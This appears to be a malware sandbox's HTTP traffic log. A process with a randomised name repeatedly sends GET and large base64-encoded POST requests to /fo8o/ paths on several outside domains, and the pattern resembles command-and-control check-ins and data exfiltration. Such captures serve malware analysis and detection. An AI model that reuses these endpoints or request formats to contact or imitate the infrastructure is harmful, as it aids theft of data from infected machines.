Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49746	116.50.37.244	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:15:22.406344891 CEST	505	OUT	GET /fo8o/?qD=FrMTb&aZ=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.goldenjade-travel.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 8, 2024 18:15:23.691433907 CEST	869	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.goldenjade-travel.com/fo8o/?qD=FrMTb&aZ=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4= Server: Microsoft-IIS/10.0 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS Access-Control-Allow-Credentials: true Date: Sat, 08 Jun 2024 16:15:22 GMT Connection: close Content-Length: 293 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 3f 71 44 3d 46 72 4d 54 62 26 61 6d 70 3b 61 5a 3d 4c 46 4b 71 79 72 63 75 37 67 31 4e 43 61 38 62 4c 6c 72 49 73 2b 4d 33 38 5a 4d 4a 72 51 53 70 72 49 4d 4c 74 61 57 67 4b 4a 39 62 42 4b 51 72 34 64 73 6e 79 4d 50 46 70 4d 51 6a 4a 4c 47 52 37 69 65 79 78 75 70 4f 53 70 76 31 48 62 66 55 61 4d 61 46 32 7a 4d 49 6b 69 67 76 69 36 70 49 58 36 69 38 4d 75 41 65 58 48 4e 72 45 4e 44 6e 49 32 57 4a 69 2f 34 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/?qD=FrMTb&aZ=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49747	46.30.213.191	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:15:29.008886099 CEST	791	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.antonio-vivaldi.mobi Origin: http://www.antonio-vivaldi.mobi Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 199 Referer: http://www.antonio-vivaldi.mobi/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 6b 52 35 38 65 32 62 58 69 70 4f 6a 51 67 39 6e 58 49 5a 50 54 73 6a 6b 6e 6c 36 6b 56 4e 59 54 70 6e 41 61 59 37 75 74 36 56 71 57 44 58 49 4f 36 55 6f 74 53 70 6f 38 4f 56 2f 4e 4e 5a 53 39 32 39 6e 4c 43 63 50 43 44 48 4a 65 37 35 51 32 66 46 4f 70 35 50 7a 68 78 53 4f 58 48 69 4e 78 6d 7a 61 6d 6d 45 2f 4a 74 73 59 39 32 6c 49 62 39 6e 41 55 2b 67 6e 51 41 4b 75 6e 65 53 4e 74 6e 30 74 57 37 64 63 49 2f 48 79 63 76 4b 62 52 33 31 30 4f 6e 79 78 75 69 79 43 2f 56 72 45 77 44 4b 4c 50 4c 70 68 54 64 46 48 74 54 32 2b 50 6d 76 66 38 73 41 3d 3d Data Ascii: aZ=CRNZjizTKDTdkR58e2bXipOjQg9nXIZPTsjknl6kVNYTpnAaY7ut6VqWDXIO6UotSpo8OV/NNZS929nLCcPCDHJe75Q2fFOp5PzhxSOXHiNxmzammE/JtsY92lIb9nAU+gnQAKuneSNtn0tW7dcI/HycvKbR310OnyxuiyC/VrEwDKLPLphTdFHtT2+Pmvf8sA==
Jun 8, 2024 18:15:30.264281034 CEST	561	IN	HTTP/1.1 302 Found Cache-Control: max-age:600, public Content-Length: 163 Expires: Sat, 08 Jun 2024 16:25:30 GMT Last-Modified: Sat, 08 Jun 2024 16:15:30 GMT Location: https://musee.mobi/vivaldi/fo8o/ Date: Sat, 08 Jun 2024 16:15:30 GMT Content-Type: text/html; charset=utf-8 X-Onecom-Cluster-Name: X-Varnish: 13294079287 Age: 0 Via: 1.1 webcache2 (Varnish/trunk) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09 Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49748	46.30.213.191	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:15:31.558270931 CEST	811	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.antonio-vivaldi.mobi Origin: http://www.antonio-vivaldi.mobi Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 219 Referer: http://www.antonio-vivaldi.mobi/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 32 69 68 38 63 56 7a 58 72 70 4f 73 4d 77 39 6e 63 6f 5a 4c 54 73 2f 6b 6e 6e 58 37 53 2f 4d 54 6f 46 49 61 62 35 47 74 2f 56 71 57 4c 33 49 50 33 30 6f 6b 53 70 6c 44 4f 55 44 4e 4e 5a 47 39 32 35 76 4c 43 76 33 4e 42 58 4a 51 77 5a 51 34 62 46 4f 70 35 50 7a 68 78 53 61 78 48 69 6c 78 6d 67 43 6d 6e 6c 2f 4b 7a 38 59 2b 78 6c 49 62 77 48 41 59 2b 67 6d 7a 41 4c 7a 38 65 55 52 74 6e 77 70 57 38 4d 63 4a 71 33 7a 58 78 36 61 42 36 46 46 79 35 43 45 64 74 68 2b 4f 61 4b 67 4f 43 4d 61 56 61 59 41 45 50 46 6a 65 4f 78 33 37 72 73 69 31 33 50 62 54 63 64 77 62 4f 7a 5a 4b 34 76 33 69 48 4e 55 44 39 59 63 3d Data Ascii: aZ=CRNZjizTKDTd2ih8cVzXrpOsMw9ncoZLTs/knnX7S/MToFIab5Gt/VqWL3IP30okSplDOUDNNZG925vLCv3NBXJQwZQ4bFOp5PzhxSaxHilxmgCmnl/Kz8Y+xlIbwHAY+gmzALz8eURtnwpW8McJq3zXx6aB6FFy5CEdth+OaKgOCMaVaYAEPFjeOx37rsi13PbTcdwbOzZK4v3iHNUD9Yc=
Jun 8, 2024 18:15:32.378036976 CEST	561	IN	HTTP/1.1 302 Found Cache-Control: max-age:600, public Content-Length: 163 Expires: Sat, 08 Jun 2024 16:25:32 GMT Last-Modified: Sat, 08 Jun 2024 16:15:32 GMT Location: https://musee.mobi/vivaldi/fo8o/ Date: Sat, 08 Jun 2024 16:15:32 GMT Content-Type: text/html; charset=utf-8 X-Onecom-Cluster-Name: X-Varnish: 13132182092 Age: 0 Via: 1.1 webcache2 (Varnish/trunk) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09 Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49749	46.30.213.191	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:15:34.094307899 CEST	10893	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.antonio-vivaldi.mobi Origin: http://www.antonio-vivaldi.mobi Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10299 Referer: http://www.antonio-vivaldi.mobi/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 32 69 68 38 63 56 7a 58 72 70 4f 73 4d 77 39 6e 63 6f 5a 4c 54 73 2f 6b 6e 6e 58 37 53 2f 30 54 70 77 45 61 62 65 79 74 34 56 71 57 42 58 49 43 33 30 70 32 53 70 73 4b 4f 55 50 64 4e 63 43 39 30 65 76 4c 45 65 33 4e 62 48 4a 51 2f 35 51 31 66 46 4f 77 35 4c 66 6c 78 53 4b 78 48 69 6c 78 6d 6d 47 6d 67 30 2f 4b 30 4d 59 39 32 6c 49 66 39 6e 42 78 2b 67 2f 49 41 4c 6e 73 65 43 68 74 6d 55 4e 57 35 36 49 4a 32 6e 7a 56 77 36 62 45 36 46 4a 58 35 43 5a 6d 74 67 4b 6f 61 4a 38 4f 43 72 6e 36 4a 73 55 44 4d 47 6d 59 63 7a 54 4d 73 4f 47 74 75 75 4c 78 4b 4e 45 47 53 77 5a 2b 30 2b 65 72 54 4d 4a 47 68 38 38 63 4b 58 55 38 73 54 51 48 61 33 67 6d 74 35 30 6f 35 74 63 35 55 70 51 39 55 74 35 61 33 37 58 63 58 4b 44 66 65 46 2f 42 33 36 5a 32 49 4a 47 62 4a 33 42 62 43 34 4c 4f 72 75 4d 31 49 42 78 36 31 41 30 6d 75 36 34 6a 68 38 36 4f 4d 61 6d 31 58 73 6e 54 65 54 31 4b 76 56 71 61 76 41 69 74 50 58 56 74 71 32 6e 36 74 32 73 37 39 37 69 49 39 54 6e 78 51 6b 73 [TRUNCATED] Data Ascii: aZ=CRNZjizTKDTd2ih8cVzXrpOsMw9ncoZLTs/knnX7S/0TpwEabeyt4VqWBXIC30p2SpsKOUPdNcC90evLEe3NbHJQ/5Q1fFOw5LflxSKxHilxmmGmg0/K0MY92lIf9nBx+g/IALnseChtmUNW56IJ2nzVw6bE6FJX5CZmtgKoaJ8OCrn6JsUDMGmYczTMsOGtuuLxKNEGSwZ+0+erTMJGh88cKXU8sTQHa3gmt50o5tc5UpQ9Ut5a37XcXKDfeF/B36Z2IJGbJ3BbC4LOruM1IBx61A0mu64jh86OMam1XsnTeT1KvVqavAitPXVtq2n6t2s797iI9TnxQksrDIdhwoh6VDAzJmTp3OslUIKnYUP8zz6VsEpJy64KxkYf+j9W6GAl/iEoVZJbP+va8Y6n2BmoxbGmSAYM2xjf/oMuGusTPEDRJ3b9Kp3K2J/zaWqfWjdC/eNv/bBckEzjQeDwrdUdX1ig3vZmjO+5JdC+dBMd2xymb+pv6gm5Y+bzo29aaJQxUBausBXivDJ7qEnK5cmfLdpVBl5t0y9uSokC26kM9vHF0K8tiB+lI1XtxRWrC8z6P0jdDkc9YQX8W/OhkpcnS+45n8Jkf84yZ9g/5fkL6nFq0zJGAsq9YEB5xebmcEAud4B+LMJXlMhBl4dV1ie7RCFzqZyHrJ8H2GSq9DBwWiot+ylhALEoguOmL22jCo3SnqbMzskvTfyDBPVZKExuf/M9DrRF4wjBZnTmnNwSAhfIZcJODhqsTgDI6QoYLD+aSc09LCyfdpBhADb0YBJANdzHYqSjhHO09NrQyM73aRGi4qT3FiHAYB0DyoJBDwfDTO+VGQofrc70rYz+eM7P9wpg51koxYei2hTb3r9JsTjGlwkKRhAGCDVWt+5rokRAcgnrldypkj6qljMLeng6fKqlnZYih25+nkDbxcwDwBYdqyUWYcob3NwKOwPrhoOZxo3vTvsDiYbTN7PiiJRSKTVvNHDzyk03PhDxhKwAqCB0O [TRUNCATED]
Jun 8, 2024 18:15:34.914891958 CEST	561	IN	HTTP/1.1 302 Found Cache-Control: max-age:600, public Content-Length: 163 Expires: Sat, 08 Jun 2024 16:25:34 GMT Last-Modified: Sat, 08 Jun 2024 16:15:34 GMT Location: https://musee.mobi/vivaldi/fo8o/ Date: Sat, 08 Jun 2024 16:15:34 GMT Content-Type: text/html; charset=utf-8 X-Onecom-Cluster-Name: X-Varnish: 13218128184 Age: 0 Via: 1.1 webcache2 (Varnish/trunk) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09 Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49750	46.30.213.191	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:15:36.624665022 CEST	504	OUT	GET /fo8o/?aZ=PTl5gU/3CD/Xhg5KDlHojN2VTQtAUK5FTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZdnZ60ZUmbyLe/qr8s1uSeQEj8wGRnlWDvMs=&qD=FrMTb HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.antonio-vivaldi.mobi Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 8, 2024 18:15:37.438873053 CEST	831	IN	HTTP/1.1 302 Found Cache-Control: max-age:600, public Content-Length: 300 Expires: Sat, 08 Jun 2024 16:25:37 GMT Last-Modified: Sat, 08 Jun 2024 16:15:37 GMT Date: Sat, 08 Jun 2024 16:15:37 GMT Content-Type: text/html; charset=utf-8 location: https://musee.mobi/vivaldi/fo8o/?aZ=PTl5gU/3CD/Xhg5KDlHojN2VTQtAUK5FTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZdnZ60ZUmbyLe/qr8s1uSeQEj8wGRnlWDvMs=&qD=FrMTb X-Onecom-Cluster-Name: X-Varnish: 13202729823 Age: 0 Via: 1.1 webcache2 (Varnish/trunk) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 3f 61 5a 3d 50 54 6c 35 67 55 2f 33 43 44 2f 58 68 67 35 4b 44 6c 48 6f 6a 4e 32 56 54 51 74 41 55 4b 35 46 54 5a 75 56 6d 6d 36 67 66 72 77 53 6a 6e 42 72 53 72 61 55 2f 30 47 64 48 41 73 44 30 6d 46 78 4e 72 41 52 46 30 7a 57 64 38 43 4c 77 76 48 4b 62 73 36 5a 64 6e 5a 36 30 5a 55 6d 62 79 4c 65 2f 71 72 38 73 31 75 53 65 51 45 6a 38 77 47 52 6e 6c 57 44 76 4d 73 3d 26 61 6d 70 3b 71 44 3d 46 72 4d 54 62 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09 Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/?aZ=PTl5gU/3CD/Xhg5KDlHojN2VTQtAUK5FTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZdnZ60ZUmbyLe/qr8s1uSeQEj8wGRnlWDvMs=&qD=FrMTb" >here</a></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49751	85.159.66.93	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:15:42.687410116 CEST	773	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 199 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 6b 37 45 61 72 56 62 45 53 75 75 52 42 67 2b 62 76 78 5a 38 35 44 44 61 79 53 41 48 58 4c 67 73 77 3d 3d Data Ascii: aZ=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R0k7EarVbESuuRBg+bvxZ85DDaySAHXLgsw==
Jun 8, 2024 18:15:43.626303911 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Sat, 08 Jun 2024 16:15:43 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-06-08T16:15:48.4881186Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49752	85.159.66.93	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:15:45.224600077 CEST	793	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 219 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 6e 77 48 31 62 30 4b 55 32 70 33 31 34 55 71 54 73 4a 79 47 36 4e 68 6e 69 4b 2b 6f 68 44 4d 49 4d 3d Data Ascii: aZ=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5nwH1b0KU2p314UqTsJyG6NhniK+ohDMIM=
Jun 8, 2024 18:15:46.211854935 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Sat, 08 Jun 2024 16:15:46 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 18 X-Rate-Limit-Reset: 2024-06-08T16:15:48.4881186Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49753	85.159.66.93	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:15:47.752595901 CEST	10875	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10299 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 75 33 54 6d 77 4d 61 71 51 6d 74 4c 43 70 54 55 37 78 4b 47 4b 50 33 48 63 71 76 79 6b 54 69 45 69 48 36 46 44 46 6a 35 4a 63 61 73 72 2b 54 30 59 77 4c 51 2b 36 33 73 63 54 68 32 45 66 54 73 59 6e 4a 78 53 73 4c 30 69 71 70 58 30 78 33 4b 4d 44 5a 75 4f 51 38 58 64 55 44 58 39 61 68 67 42 65 42 73 6a 38 6e 71 74 68 2f 73 6b 63 71 73 4c 75 51 2b 31 6d 4f 73 39 4a 51 4a 4e 66 55 41 36 4d 68 73 32 39 78 6c 73 68 64 74 75 6f 47 7a 73 6d 58 51 75 70 6d 64 53 4f 2f 6f 47 54 33 56 67 64 32 33 32 [TRUNCATED] Data Ascii: 